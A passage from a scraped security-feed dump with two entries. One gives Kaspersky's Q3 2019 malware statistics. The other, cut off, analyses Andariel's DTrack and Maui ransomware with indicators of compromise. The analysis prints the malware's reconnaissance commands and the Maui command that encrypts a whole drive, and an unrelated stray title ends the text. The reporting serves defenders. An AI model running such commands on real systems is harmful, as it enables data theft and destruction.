(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/28171358/malware-q3-2019-statistics-en-12.png>)\n\n### Attack geography\n\nTo evaluate and compare the risk of being infected by banking Trojans and ATM/POS malware worldwide, for each country we calculated the share of users of Kaspersky products that faced this threat during the reporting period out of all users of our products in that country.\n\n_Geography of banking malware attacks, Q3 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/28171406/malware-q3-2019-statistics-en-13.png>)\n\n**TOP 10 countries by share of attacked users**\n\n| **Country*** | **%**** \n---|---|--- \n1 | Belarus | 2.9 \n2 | Uzbekistan | 2.1 \n3 | South Korea | 1.9 \n4 | Venezuela | 1.8 \n5 | Tajikistan | 1.4 \n6 | Afghanistan | 1.3 \n7 | China | 1.2 \n8 | Syria | 1.2 \n9 | Yemen | 1.2 \n10 | Sudan | 1.1 \n \n_* Excluded are countries with relatively few Kaspersky product users (under 10,000)._ \n_** Unique users whose computers were targeted by banking Trojans as a percentage of all unique users of Kaspersky products in the country._\n\n**TOP 10 banking malware families**\n\n| Name | Verdicts | %* \n---|---|---|--- \n1 | Zbot | Trojan.Win32.Zbot | 26.7 | \n2 | Emotet | Backdoor.Win32.Emotet | 23.9 | \n3 | RTM | Trojan-Banker.Win32.RTM | 19.3 | \n4 | Nimnul | Virus.Win32.Nimnul | 6.6 | \n5 | Trickster | Trojan.Win32.Trickster | 5.8 | \n6 | CliptoShuffler | Trojan-Banker.Win32.CliptoShuffler | 5.4 | \n7 | Nymaim | Trojan.Win32.Nymaim | 3.6 | \n8 | SpyEye | Trojan-Spy.Win32.SpyEye | 3.4 | \n9 | Danabot | Trojan-Banker.Win32.Danabot | 3.3 | \n10 | Neurevt | Trojan.Win32.Neurevt | 1.8 | \n \n_** Unique users attacked by this malware as a percentage of all users attacked by financial malware._\n\nThe TOP 3 in Q3 2019 had the same faces as last quarter, only in a different order: the RTM family (19.3%) dropped from first to third, shedding almost 13 p.p., allowing the other two \u2014 Zbot (26.7%) and Emotet (23.9%) \u2014 to climb up. Last quarter we noted a decline in the activity of Emotet servers, but in Q3 it came back on track, with Emotet's share growing by more than 15 p.p.\n\nFourth and fifth places did not change at all \u2014 still occupied by Nimnul (6.6%) and Trickster (5.8%). Their scores rose insignificantly, less than 1 p.p. Of the new entries in our TOP 10, worth noting is the banker CliptoShuffler (5.4%), which stormed straight into sixth place.\n\n## Ransomware programs\n\n### Quarterly highlights\n\nThe number of ransomware attacks against [government](<https://threatpost.com/ransomware-demand-massachusetts-city-no-thanks/148034/>) [agencies](<https://threatpost.com/coordinated-ransomware-attack-hits-23-texas-government-agencies/147457/>), as well as organizations in the healthcare, [education](<https://www.bleepingcomputer.com/news/security/monroe-college-hit-with-ransomware-2-million-demanded/>), and [energy](<https://www.bleepingcomputer.com/news/security/ransomware-attack-cripples-power-company-s-entire-network/>) sectors, continues to rise. This trend we [noted](<https://securelist.com/it-threat-evolution-q2-2019-statistics/92053/#glavnye-sobytiya-kvartala>) back in the previous quarter.\n\nA [new type of attack](<https://threatpost.com/linux-ransomware-nas-servers/146441/>), one on network attached storages (NAS), is gaining ground. The infection scheme involves attackers scanning IP address ranges in search of NAS devices accessible via the Internet. Generally, only the web interface is accessible from the outside, protected by an authentication page; however, a number of devices have vulnerabilities in the firmware. This enables cybercriminals, by means of an exploit, to install on the device a Trojan that encrypts all data on NAS-connected media. This is a particularly dangerous attack, since in many cases the NAS is used to store backups, and such devices are generally perceived by their owners as a reliable means of storage, and the mere possibility of an infection can come as a shock.\n\n[Wipers](<https://encyclopedia.kaspersky.com/glossary/wiper/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) have also become a [more frequent attack tool](<https://www.bleepingcomputer.com/news/security/destructive-ordinypt-malware-hitting-germany-in-new-spam-campaign/>). Like ransomware, such programs rename files and make ransom demands. But these Trojans irreversibly ruin the file contents (replacing them with zeros or random bytes), so even if the victim pays up, the original files are lost.\n\nThe FBI published decryption keys for GandCrab (verdict Trojan-Ransom.Win32.GandCrypt) versions 4 and 5. The decryption was added to the latest [RakhniDecryptor](<https://support.kaspersky.com/10556>) build.\n\n### Number of new modifications\n\nIn Q3 2019, we identified three new families of ransomware Trojans and discovered 13,138 new modifications of this malware.\n\n_Number of new ransomware modifications, Q3 2018 \u2013 Q3 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/28171414/malware-q3-2019-statistics-en-14.png>)\n\n### Number of users attacked by ransomware Trojans\n\nIn Q3 2019, Kaspersky products defeated ransomware attacks against 229,643 unique KSN users. This is slightly fewer than the previous quarter.\n\n_Number of unique users attacked by ransomware Trojans, Q3 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/28171421/malware-q3-2019-statistics-en-15.png>)\n\nJuly saw the largest number of attacked users \u2014 100,380, almost 20,000 more than in June. After that, however, this indicator fell sharply and did not stray far from the figure of 90,000 attacked users.\n\n### Attack geography\n\n_Geographical spread of countries by share of users attacked by ransomware Trojans, Q3 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/28171430/malware-q3-2019-statistics-en-16.png>)\n\n**TOP 10 countries attacked by ransomware Trojans**\n\n| **Country*** | **% of users attacked by cryptors**** \n---|---|--- \n1 | Bangladesh | 6.39 \n2 | Mozambique | 2.96 \n3 | Uzbekistan | 2.26 \n4 | Nepal | 1.71 \n5 | Ethiopia | 1.29 \n6 | Ghana | 1.19 \n7 | Afghanistan | 1.12 \n8 | Egypt | 0.83 \n9 | Palestine | 0.80 \n10 | Vietnam | 0.79 \n \n_* Excluded are countries with relatively few Kaspersky users (under 50,000)._ \n_** Unique users whose computers were attacked by ransomware Trojans as a percentage of all unique users of Kaspersky products in the country._\n\n### TOP 10 most common families of ransomware Trojans\n\n| **Name** | **Verdicts** | **% of attacked users*** \n---|---|---|--- \n1 | WannaCry | Trojan-Ransom.Win32.Wanna | 20.96 | \n2 | (generic verdict) | Trojan-Ransom.Win32.Phny | 20.01 | \n3 | GandCrab | Trojan-Ransom.Win32.GandCrypt | 8.58 | \n4 | (generic verdict) | Trojan-Ransom.Win32.Gen | 8.36 | \n5 | (generic verdict) | Trojan-Ransom.Win32.Encoder | 6.56 | \n6 | (generic verdict) | Trojan-Ransom.Win32.Crypren | 5.08 | \n7 | Stop | Trojan-Ransom.Win32.Stop | 4.63 | \n8 | Rakhni | Trojan-Ransom.Win32.Rakhni | 3.97 | \n9 | (generic verdict) | Trojan-Ransom.Win32.Crypmod | 2.77 | \n10 | PolyRansom/VirLock | Virus.Win32.PolyRansom \nTrojan-Ransom.Win32. PolyRansom | 2.50 | \n| | | | | \n \n_* Unique Kaspersky users attacked by the specified family of ransomware Trojans as a percentage of all users attacked by ransomware Trojans._\n\n## Miners\n\n### Number of new modifications\n\nIn Q3 2019, Kaspersky solutions detected 11 753 new modifications of miners.\n\n_Number of new miner modifications, Q3 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/28171437/malware-q3-2019-statistics-en-17.png>)\n\n### Number of users attacked by miners\n\nIn Q3, we detected attacks using miners on the computers of 639,496 unique users of Kaspersky products worldwide.\n\n_Number of unique users attacked by miners, Q3 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/28171445/malware-q3-2019-statistics-en-18.png>)\n\nThe number of attacked users continued to decline in Q3, down to 282,334 in August. In September, this indicator began to grow \u2014 up to 297,394 \u2014 within touching distance of July's figure.\n\n### Attack geography\n\n_Geographical spread of countries by share of users attacked by miners, Q3 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/28171455/malware-q3-2019-statistics-en-19.png>)\n\n**TOP 10 countries by share of users attacked by miners**\n\n| **Country*** | **% of users attacked by miners**** \n---|---|--- \n1 | Afghanistan | 9.42 \n2 | Ethiopia | 7.29 \n3 | Uzbekistan | 4.99 \n4 | Sri Lanka | 4.62 \n5 | Tanzania | 4.35 \n6 | Vietnam | 3.72 \n7 | Kazakhstan | 3.66 \n8 | Mozambique | 3.44 \n9 | Rwanda | 2.55 \n10 | Bolivia | 2.43 \n \n_* Excluded are countries with relatively few Kaspersky users (under 50,000)._ \n_** Unique users whose computers were attacked by miners as a percentage of all unique users of Kaspersky products in the country._\n\n## Vulnerable applications used by cybercriminals during cyber attacks\n\nAs before, in the statistics on the distribution of exploits used by cybercriminals, a huge share belongs to vulnerabilities in the Microsoft Office suite (73%). Most common of all, as in the previous quarter, were stack overflow errors ([CVE-2017-11882](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882>), [CVE-2018-0802](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0802>)) in the Equation Editor application, which was previously part of Microsoft Office. Other Microsoft Office vulnerabilities widely exploited this quarter were again [CVE-2017-8570](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8570>), [CVE-2017-8759](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8759>), and [CVE-2017-0199](<https://nvd.nist.gov/vuln/detail/CVE-2017-0199>).\n\nModern browsers are complex software products, which means that new vulnerabilities are constantly being discovered and used in attacks (13%). The most common target for cybercriminals is Microsoft Internet Explorer, vulnerabilities in which are often exploited in the wild. This quarter saw the discovery of the actively exploited zero-day vulnerability [CVE-2019-1367](<https://www.helpnetsecurity.com/2019/09/24/cve-2019-1367/>), which causes memory corruption and allows remote code execution on the target system. The fact that Microsoft released an unscheduled patch for it points to how serious the situation was. Nor was Google Chrome problem-free this quarter, having received updates to fix a number of [critical vulnerabilities](<https://www.cisecurity.org/advisory/multiple-vulnerabilities-in-google-chrome-could-allow-for-arbitrary-code-execution_2019-095/>) (CVE-2019-13685, CVE-2019-13686, CVE-2019-13687, CVE-2019-13688), some of which allow intruders to circumvent all levels of browser protection and execute code in the system, bypassing the [sandbox](<https://encyclopedia.kaspersky.com/glossary/sandbox/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>).\n\nThe majority of vulnerabilities aimed at privilege escalation inside the system stem from individual operating system services and popular apps. Privilege escalation vulnerabilities play a special role, as they are often utilized in malicious software to obtain persistence in the target system. Of note this quarter are the vulnerabilities [CVE-2019-14743](<https://www.bleepingcomputer.com/news/security/steam-security-saga-continues-with-vulnerability-fix-bypass/>) and [CVE-2019-15315](<https://nvd.nist.gov/vuln/detail/CVE-2019-15315>), which allow compromising systems with the popular Steam client installed. A flaw in the Microsoft Windows Text Services Framework also warrants a mention. A Google researcher published a tool to demonstrate the problem ([CtfTool](<https://blog.stealthbits.com/using-ctftool-exe-to-escalate-privileges-by-leveraging-text-services-framework-and-mitigation-processes-and-steps/>)), which allows processes to be run with system privileges, as well as changes to be made to the memory of other processes and arbitrary code to be executed in them.\n\n_Distribution of exploits used in attacks by type of application attacked, Q3 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/28171502/malware-q3-2019-statistics-en-20.png>)\n\nNetwork attacks are still widespread. This quarter, as in previous ones, we registered numerous attempts to exploit vulnerabilities in the SMB protocol. This indicates that unprotected and not-updated systems are still at high risk of infection in attacks that deploy EternalBlue, EternalRomance, and other exploits. That said, a large share of malicious network traffic is made up of requests aimed at bruteforcing passwords in popular network services and servers, such as Remote Desktop Protocol and Microsoft SQL Server. RDP faced other problems too related to the detection of several vulnerabilities in this network protocol united under the common name [DejaBlue](<https://www.wired.com/story/dejablue-windows-bugs-worm-rdp/>) ([CVE-2019-1181](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2019-1181>), [CVE-2019-1182](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2019-1182>), [CVE-2019-1222](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2019-1222>), [CVE-2019-1223](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2019-1223>), [CVE-2019-1224](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2019-1224>), [CVE-2019-1225](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2019-1225>), [CVE-2019-1226](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2019-1226>)). Unlike the previously discovered [CVE-2019-0708](<https://blogs.technet.microsoft.com/msrc/2019/05/14/prevent-a-worm-by-updating-remote-desktop-services-cve-2019-0708/>), these vulnerabilities affect not only old versions of operating systems, but new ones as well, such as Windows 10. As in the case of [CVE-2019-0708](<https://blogs.technet.microsoft.com/msrc/2019/05/14/prevent-a-worm-by-updating-remote-desktop-services-cve-2019-0708/>), some [DejaBlue](<https://www.wired.com/story/dejablue-windows-bugs-worm-rdp/>) vulnerabilities do not require authorization in the attacked system and allow to carry out malicious activity invisible to the user. Therefore, it is vital to promptly install the latest updates for both the operating system and antivirus solutions to reduce the risk of infection.\n\n### Attacks via web resources\n\n_The statistics in this section are based on Web Anti-Virus, which protects users when malicious objects are downloaded from malicious/infected web pages. Malicious websites are specially created by cybercriminals; web resources with user-created content (for example, forums), as well as hacked legitimate resources, can be infected._\n\n### Countries that are sources of web-based attacks: TOP 10\n\n_The following statistics show the distribution by country of the sources of Internet attacks blocked by Kaspersky products on user computers (web pages with redirects to exploits, sites containing exploits and other malicious programs, botnet C&C centers, etc.). Any unique host could be the source of one or more web-based attacks._\n\n_To determine the geographical source of web-based attacks, domain names are matched against their actual domain IP addresses, and then the geographical location of a specific IP address (GEOIP) is established._\n\nIn Q3 2019, Kaspersky solutions blocked **989,432,403** attacks launched from online resources located in 203 countries across the globe. **560,025,316** unique URLs triggered Web Anti-Virus components.\n\n_Distribution of web-based attack sources by country, Q3 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/28171508/malware-q3-2019-statistics-en-21.png>)\n\n### Countries where users faced the greatest risk of online infection\n\nTo assess the risk of online infection faced by users in different countries, for each country we calculated the percentage of Kaspersky users on whose computers Web Anti-Virus was triggered during the quarter. The resulting data provides an indication of the aggressiveness of the environment in which computers operate in different countries.\n\nThis rating only includes attacks by malicious programs that fall under the **Malware class**; it does not include Web Anti-Virus detections of potentially dangerous or unwanted programs such as RiskTool or adware.\n\n| Country* | % of attacked users** \n---|---|--- \n1 | Tunisia | 23.26 \n2 | Algeria | 19.75 \n3 | Albania | 18.77 \n4 | R\u00e9union | 16.46 \n5 | Bangladesh | 16.46 \n6 | Venezuela | 16.21 \n7 | North Macedonia | 15.33 \n8 | France | 15.09 \n9 | Qatar | 14.97 \n10 | Martinique | 14.84 \n11 | Greece | 14.59 \n12 | Serbia | 14.36 \n13 | Syria | 13.99 \n14 | Bulgaria | 13.88 \n15 | Philippines | 13.71 \n16 | UAE | 13.64 \n17 | Djibouti | 13.47 \n18 | Morocco | 13.35 \n19 | Belarus | 13.34 \n20 | Saudi Arabia | 13.30 \n \n_* Excluded are countries with relatively few Kaspersky users (under 10,000)._ \n_** Unique users targeted by **Malware-class** attacks as a percentage of all unique users of Kaspersky products in the country._\n\n_These statistics are based on detection verdicts returned by the Web Anti-Virus module that were received from users of Kaspersky products who consented to provide statistical data._\n\nOn average, 10.97% of Internet user computers worldwide experienced at least one **Malware-class** attack.\n\n_Geography of malicious web-based attacks, Q3 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/28171517/malware-q3-2019-statistics-en-22.png>)\n\n## Local threats\n\n_Statistics on local infections of user computers are an important indicator. They include objects that penetrated the target computer through infecting files or removable media, or initially made their way onto the computer in non-open form (for example, programs in complex installers, encrypted files, etc.)._\n\n_Data in this section is based on analyzing statistics produced by Anti-Virus scans of files on the hard drive at the moment they were created or accessed, and the results of scanning removable storage media._\n\nIn Q3 2019, our File Anti-Virus detected **230,051,054** malicious and potentially unwanted objects.\n\n#### **Countries where users faced the highest risk of local infection**\n\nFor each country, we calculated the percentage of Kaspersky product users on whose computers File Anti-Virus was triggered during the reporting period. These statistics reflect the level of personal computer infection in different countries.\n\nNote that this rating only includes attacks by malicious programs that fall under the **Malware class**; it does not include File Anti-Virus triggers in response to potentially dangerous or unwanted programs, such as RiskTool or adware.\n\n| Country* | % of attacked users** \n---|---|--- \n1 | Afghanistan | 53.45 \n2 | Tajikistan | 48.43 \n3 | Yemen | 48.39 \n4 | Uzbekistan | 48.38 \n5 | Turkmenistan | 45.95 \n6 | Myanmar | 45.27 \n7 | Ethiopia | 44.18 \n8 | Laos | 43.24 \n9 | Bangladesh | 42.96 \n10 | Mozambique | 41.58 \n11 | Syria | 41.15 \n12 | Vietnam | 41.11 \n13 | Iraq | 41.09 \n14 | Sudan | 40.18 \n15 | Kyrgyzstan | 40.06 \n16 | China | 39.94 \n17 | Rwanda | 39.49 \n18 | Venezuela | 39.18 \n19 | Malawi | 38.81 \n20 | Nepal | 38.38 \n| | \n \n_These statistics are based on detection verdicts returned by OAS and ODS Anti-Virus modules received from users of Kaspersky products who consented to provide statistical data. The data includes detections of malicious programs located on user computers or removable media connected to computers, such as flash drives, camera memory cards, phones and external hard drives._\n\n_* Excluded are countries with relatively few Kaspersky users (under 10,000)._ \n_** Unique users on whose computers **Malware-class** local threats were blocked, as a percentage of all unique users of Kaspersky products in the country._\n\n_Geography of local infection attempts, Q3 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/28171525/malware-q3-2019-statistics-en-23.png>)\n\nOverall, 21.1% of user computers globally faced at least one **Malware-class** local threat during Q3.\n\nThe figure for Russia was 24.24%.", "cvss3": {}, "published": "2019-11-29T10:00:19", "type": "securelist", "title": "IT threat evolution Q3 2019. Statistics", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-0199", "CVE-2017-11882", "CVE-2017-8570", "CVE-2017-8759", "CVE-2018-0802", "CVE-2019-0708", "CVE-2019-1181", "CVE-2019-1182", "CVE-2019-1222", "CVE-2019-1223", "CVE-2019-1224", "CVE-2019-1225", "CVE-2019-1226", "CVE-2019-1367", "CVE-2019-13685", "CVE-2019-13686", "CVE-2019-13687", "CVE-2019-13688", "CVE-2019-14743", "CVE-2019-15315"], "modified": "2019-11-29T10:00:19", "id": "SECURELIST:FD71ACDBBCF57BD4C7DE182D2309BF9D", "href": "https://securelist.com/it-threat-evolution-q3-2019-statistics/95269/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-09T15:51:11", "description": "\n\nOn July 7, 2022, the CISA published an alert, entitled, "[North Korean State-Sponsored Cyber Actors Use Maui Ransomware To Target the Healthcare and Public Health Sector](<https://www.cisa.gov/uscert/ncas/alerts/aa22-187a>)," related to a Stairwell report, "[Maui Ransomware](<https://stairwell.com/wp-content/uploads/2022/07/Stairwell-Threat-Report-Maui-Ransomware.pdf>)." Later, the Department of Justice [announced](<https://www.justice.gov/opa/speech/deputy-attorney-general-lisa-o-monaco-delivers-keynote-address-international-conference>) that they had effectively [clawed back $500,000](<https://www.bankinfosecurity.com/fbi-claws-back-cryptocurrency-ransoms-paid-to-north-koreans-a-19621>) in ransom payments to the group, partly thanks to new legislation. We can confirm a Maui ransomware incident in 2022, and add some incident and attribution findings.\n\nWe extend their "first seen" date from the reported May 2021 to April 15th 2021, and the geolocation of the target, to Japan. Because the malware in this early incident was compiled on April 15th, 2021, and compilation dates are the same for all known samples, this incident is possibly the first ever involving the Maui ransomware.\n\nWhile CISA provides no useful information in its report to attribute the ransomware to a North Korean actor, we determined that approximately ten hours prior to deploying Maui to the initial target system, the group deployed a variant of the well-known DTrack malware to the target, preceded by 3proxy months earlier. This data point, along with others, should openly help solidify the attribution to the Korean-speaking APT Andariel, also known as Silent Chollima and Stonefly, with low to medium confidence.\n\n## Background\n\nWe observed the following timeline of detections from an initial target system:\n\n 1. 2020-12-25 Suspicious 3proxy tool\n 2. 2021-04-15 DTrack malware\n 3. 2021-04-15 Maui ransomware\n\n## DTrack malware\n\nMD5 | 739812e2ae1327a94e441719b885bd19 \n---|--- \nSHA1 | 102a6954a16e80de814bee7ae2b893f1fa196613 \nSHA256 | 6122c94cbfa11311bea7129ecd5aea6fae6c51d23228f7378b5f6b2398728f67 \nLink time | 2021-03-30 02:29:15 \nFile type | PE32 executable (GUI) Intel 80386, for MS Windows \nCompiler | VS2008 build 21022 \nFile size | 1.2 MB \nFile name | C:\\Windows\\Temp\\temp\\mvhost.exe \n \nOnce this malware is spawned, it executes an embedded shellcode, loading a final Windows in-memory payload. This malware is responsible for collecting victim information and sending it to the remote host. Its functionality is almost identical to previous DTrack modules. This malware collects information about the infected host via Windows commands. The in-memory payload executes the following Windows commands:\n \n \n \"C:\\Windows\\system32\\cmd.exe\" /c ipconfig /all > \"%Temp%\\temp\\res.ip\"\n \"C:\\Windows\\system32\\cmd.exe\" /c tasklist > \"%Temp%\\temp\\task.list\"\n \"C:\\Windows\\system32\\cmd.exe\" /c netstat -naop tcp > \"%Temp%\\temp\\netstat.res\"\n \"C:\\Windows\\system32\\cmd.exe\" /c netsh interface show interface >\n \"%Temp%\\temp\\netsh.res\"\n \"C:\\Windows\\system32\\cmd.exe\" /c ping -n 1 8.8.8.8 > \"%Temp%\\temp\\ping.res\"\n\nIn addition, the malware collects browser history data, saving it to the browser.his file, just as the older variant did. Compared to the old version of DTrack, the new information-gathering module sends stolen information to a remote server over HTTP, and this variant copies stolen files to the remote host on the same network.\n\n## Maui ransomware\n\nThe Maui ransomware was detected ten hours after the DTrack variant on the same server.\n\nMD5 | ad4eababfe125110299e5a24be84472e \n---|--- \nSHA1 | 94db86c214f4ab401e84ad26bb0c9c246059daff \nSHA256 | a557a0c67b5baa7cf64bd4d42103d3b2852f67acf96b4c5f14992c1289b55eaa \nLink time | 2021-04-15 04:36:00 \nFile type | PE32 executable (GUI) Intel 80386, for MS Windows \nFile size | 763.67 KB \nFile name | C:\\Windows\\Temp\\temp\\maui.exe \n \nMultiple run parameters exist for the Maui ransomware. In this incident, we observe the actors using "-t" and "\\- x" arguments, along with a specific drive path to encrypt:\n \n \n C:\\Windows\\Temp\\temp\\bin\\Maui.exe -t 8 -x E:\n\nIn this case, "-t 8" sets the ransomware thread count to eight, "-x" commands the malware to "self melt", and the "E:" value sets the path (the entire drive in this case) to be encrypted. The ransomware functionality is the same as described in the Stairwell report.\n\nThe malware created two key files to implement file encryption:\n\nRSA private key | C:\\Windows\\Temp\\temp\\bin\\Maui.evd \n---|--- \nRSA public key | C:\\Windows\\Temp\\temp\\bin\\Maui.key \n \n## Similar DTrack malware on different victims\n\nPivoting on the exfiltration information to the adjacent hosts, we discovered additional victims in India. One of these hosts was initially compromised in February 2021. In all likelihood, Andariel stole elevated credentials to deploy this malware within the target organization, but this speculation is based on paths and other artifacts, and we do not have any further details.\n\nMD5 | f2f787868a3064407d79173ac5fc0864 \n---|--- \nSHA1 | 1c4aa2cbe83546892c98508cad9da592089ef777 \nSHA256 | 92adc5ea29491d9245876ba0b2957393633c9998eb47b3ae1344c13a44cd59ae \nLink time | 2021-02-22 05:36:16 \nFile type | PE32 executable (GUI) Intel 80386, for MS Windows \nFile size | 848 KB \n \nThe primary objective of this malware is the same as in the case of the aforementioned victim in Japan, using different login credentials and local IP address to exfiltrate data.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/08/04144620/Andariel_Deploys_DTrack_and_Maui_Ransomware_01.png>)\n\n**_Windows commands to exfiltrate data_**\n\nFrom the same victim, we discovered additional DTrack malware (MD5 87e3fc08c01841999a8ad8fe25f12fe4) using different login credentials.\n\n## Additional DTrack module and initial infection method\n\nThe ["3Proxy" tool](<https://3proxy.ru/
Top 19+ Vulnerability CVEs in Santa’s Dashboard Tracking
